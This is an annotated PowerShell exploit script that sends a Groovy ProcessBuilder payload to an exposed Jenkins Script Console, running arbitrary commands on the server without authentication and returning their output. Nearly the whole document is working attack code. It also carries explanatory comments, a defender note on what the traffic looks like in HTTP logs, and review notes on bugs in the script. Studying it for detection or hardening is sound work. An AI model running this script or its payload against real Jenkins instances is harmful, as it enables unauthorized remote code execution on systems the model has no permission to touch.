Exploit-Jenkins.ps1
function Exploit-Jenkins() {
<#
.SYNOPSIS
PowerShell delivery for unauthenticated access to Jenkins Script Console
.DESCRIPTION
Sends two HTTP requests to http://<Rhost>:<Port>/script: a GET whose response
body is discarded, then a POST of a Groovy one-liner that runs the supplied
command through java.lang.ProcessBuilder with stderr merged into stdout. The
command output is scraped from the HTML the console returns.
No credentials are sent: $credCache is never assigned in this function, so the
requests are anonymous and are expected to be rejected by an instance whose
script console requires an administrator login.
Defender note: on the wire this is a plain-HTTP POST to /script with a form body
beginning "script=" and ending "&Submit=Run", which is what front-end/HTTP access
logs would record.
Review notes: the first response and its reader are never closed; $Port has no
default, so omitting it builds the URL with port 0; if the result regex does not
match, $matches is left untouched and the return value is stale or unset.
.PARAMETER Rhost
Host to exploit
.PARAMETER Port
Port to use. Optional, but without a default - omitting it yields port 0 in the URL.
.PARAMETER Cmd
Command to run on remote Jenkins Script Console. Whitespace is treated as the
argument separator (see the -replace below).
.EXAMPLE
Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd whoami
Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd "cmd /c netstat -an"
.LINK
http://twitter.com/luxcupitor
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[string] $Rhost,
[Parameter(Mandatory=$True)]
[string] $Cmd,
[Parameter(Mandatory=$False)]
[Int] $Port
)
# System.Web is loaded only for HttpUtility::UrlEncode below.
Add-Type -Assembly System.Web
# Script console endpoint; plain HTTP, no TLS.
$url = "http://"+$($Rhost)+":"+$($Port)+"/script"
$cookiejar = New-Object System.Net.CookieContainer
# Every whitespace character becomes "','" so that, once wrapped in the single
# quotes of the POST body below, "cmd /c foo" reads as the Groovy argument list
# 'cmd','/c','foo' for ProcessBuilder.
$Cmd = $Cmd -replace "\s","','"
$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
# First request: a GET to /script. Its body is read into $output but never used
# (overwritten after the POST); only the cookie container is carried over.
$webrequest = [System.Net.HTTPWebRequest]::Create($url);
$webrequest.CookieContainer = New-Object System.Net.CookieContainer;
$webrequest.Method = "GET"
# $credCache is never assigned in this function, so this is $null unless a
# caller scope happens to define it - the request goes out anonymous.
$webrequest.Credentials = $credCache
# Always true: $cookiejar was created unconditionally above.
if ($cookiejar -ne $null) { $webrequest.CookieContainer = $cookiejar }
$response = $webrequest.GetResponse()
$responseStream = $response.GetResponseStream()
$streamReader = New-Object System.IO.Streamreader($responseStream)
# NOTE(review): $streamReader and $response are reassigned below without being closed.
$output = $streamReader.ReadToEnd()
# URL-encoded form body. Decoded, the submitted Groovy is
#   println new ProcessBuilder('<Cmd>').redirectErrorStream(true).start().text
# followed by the Submit=Run field the console form sends.
$postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"%27%29.redirectErrorStream%28true%29.start%28%29.text&Submit=Run"
$bytearray = [System.Text.Encoding]::UTF8.GetBytes($postdata)
# Second request: the POST that actually submits the script, same (null) credentials.
$webrequest = [System.Net.HTTPWebRequest]::Create($url)
$webrequest.Credentials = $credCache
if ($cookiejar -ne $null) { $webrequest.CookieContainer=$cookiejar }
$webrequest.Method = "POST"
$webrequest.ContentType = "application/x-www-form-urlencoded"
$webrequest.ContentLength = $bytearray.Length
$requestStream = $webrequest.GetRequestStream()
# Write the form body and close the request stream so the request is sent.
$requestStream.Write($bytearray, 0, $bytearray.Length)
$requestStream.Close()
$response = $webrequest.GetResponse()
$responseStream = $response.GetResponseStream()
# Read the response. The console renders the script's output inside
# "Result</h2><pre>...</pre>"; (?si) makes the match case-insensitive and lets
# "." span newlines. Neither the reader nor the response is closed here either.
$streamReader = New-Object System.IO.Streamreader($responseStream)
$output = $streamReader.ReadToEnd()
$null = $output -match "Result</h2><pre>((?si).+?)</pre>"
# NOTE(review): -match only sets $matches on success. If the page had no result
# block, $matches[1] is whatever an earlier match in the session left, or unset.
return $matches[1]
}